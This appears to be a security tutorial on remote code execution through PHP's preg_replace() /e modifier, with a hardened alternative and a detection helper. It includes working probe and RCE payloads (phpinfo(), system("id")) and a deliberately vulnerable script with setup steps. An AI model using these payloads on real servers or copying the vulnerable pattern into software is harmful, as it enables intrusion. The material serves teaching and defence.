preg_replace() in PHP
The preg_replace() function in PHP returns a string (or an array of strings) in which every match of a pattern, or of a list of patterns, in the input is replaced with the given replacement string.
The /e modifier (PCRE_REPLACE_EVAL) causes preg_replace() to evaluate the replacement string as PHP code, after backreferences have been substituted, and to use the result of that evaluation as the replacement. If an attacker controls both the pattern (and therefore its modifiers) and the replacement, this is direct remote code execution. Note that PCRE_REPLACE_EVAL (/e) was deprecated as of PHP 5.5.0 and removed in PHP 7.0.0; on PHP 7 and later, a pattern with /e produces a warning and preg_replace() returns NULL, so this technique only works against applications still running on PHP 5.
How to detect and validate
# A parameter set like the one below (a pattern, a replacement and a subject string) suggests that the backend passes them to preg_replace().
index.php?pat=/as/&rep=As&sub=any text
# Probe payload: the e modifier in the pat parameter turns the rep parameter into PHP code. If the response contains the phpinfo() page, the target is vulnerable.
payload: index.php?pat=/a/e&rep=phpinfo();&sub=abc
How to RCE
payload: index.php?pat=/a/e&rep=system("id");&sub=abc
# The pattern must match the subject at least once (here "a" in "abc"), otherwise the replacement, and the code in it, is never evaluated.
Another example
<?php
// Deliberately vulnerable: both the pattern (including its modifiers) and the
// replacement string are taken straight from the query string.
$in = 'Somewhere, something incredible is waiting to be known';
echo preg_replace($_GET['replace'], $_GET['with'], $in);
?>
# Create a PHP file (foo.php) containing the code above
# Run the PHP built-in web server (use PHP 5.x; on PHP 7+ the /e modifier is no longer supported and preg_replace() returns NULL)
# php -S localhost:8000
# Access the server with the following URL; the output of id appears in place of the word "known"
# http://localhost:8000/foo.php?replace=/known/e&with=system("id")
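The following is an added example, not code from the original page: it places the vulnerable snippet above next to a hardened version, and adds a small check that flags a user-supplied pattern carrying the e modifier (useful in code review or as a request-filter rule). The helper names (vulnerable_replace, safe_replace, pattern_uses_eval_modifier) are made up for this example; the sample inputs are constructed to mirror the payloads above.

```php
<?php
// Added example (not from the original page). Helper names are invented here.

$in = 'Somewhere, something incredible is waiting to be known';

// Vulnerable form (PHP < 7.0): pattern, modifiers and replacement are all
// attacker-controlled, so /e turns the replacement into executable PHP.
// On PHP 7+ the same call emits a warning and returns NULL.
function vulnerable_replace(string $pattern, string $with, string $in): ?string
{
    return preg_replace($pattern, $with, $in);
}

// Hardened form: never accept a full pattern from the user. Take a literal
// search term, quote it with preg_quote(), and pin the modifiers yourself.
function safe_replace(string $term, string $with, string $in): string
{
    if ($term === '' || strlen($term) > 64) {
        throw new InvalidArgumentException('bad search term');
    }
    $pattern = '/' . preg_quote($term, '/') . '/u';

    // preg_replace_callback() returns $with as an opaque string, so "$1",
    // "\\1" or "${0}" inside the replacement are not expanded and nothing
    // is ever evaluated as code.
    $out = preg_replace_callback(
        $pattern,
        static function (array $m) use ($with): string {
            return $with;
        },
        $in
    );

    if ($out === null) {
        throw new RuntimeException('regex failure, code ' . preg_last_error());
    }
    return $out;
}

// Detection helper: true when the modifier list after the closing delimiter
// contains 'e'. Handles the usual single-character delimiters as well as the
// bracket-style pairs PCRE accepts in PHP.
function pattern_uses_eval_modifier(string $pattern): bool
{
    $pattern = ltrim($pattern);
    if ($pattern === '') {
        return false;
    }
    $open  = $pattern[0];
    $pairs = ['(' => ')', '[' => ']', '{' => '}', '<' => '>'];
    $close = $pairs[$open] ?? $open;
    $end   = strrpos($pattern, $close);
    if ($end === false || $end === 0) {
        return false;           // no closing delimiter: not a valid pattern
    }
    $modifiers = substr($pattern, $end + 1);
    return strpos($modifiers, 'e') !== false;
}

// Constructed requests, mirroring the payloads shown above.
$requests = [
    ['pat' => '/known/',  'with' => 'KNOWN'],
    ['pat' => '/known/e', 'with' => 'system("id")'],
    ['pat' => '{known}ie', 'with' => 'phpinfo();'],
];

foreach ($requests as $req) {
    printf(
        "%-12s eval modifier: %s\n",
        $req['pat'],
        pattern_uses_eval_modifier($req['pat']) ? 'yes' : 'no'
    );
}

// The hardened path ignores modifiers entirely and treats the input as text,
// so the attacker's replacement simply lands in the output as a literal string.
echo safe_replace('known', 'system("id")', $in), "\n";
?>
```

The hardened function works on every supported PHP version; the point of preg_replace_callback() here is not only that it replaces /e, but that the closure returns the user's string verbatim, so backreference expansion in the replacement is also neutralised. If the application genuinely must accept a user-supplied regular expression, validate the modifier list against a short allowlist (for example i, m, s, u) rather than searching for e alone.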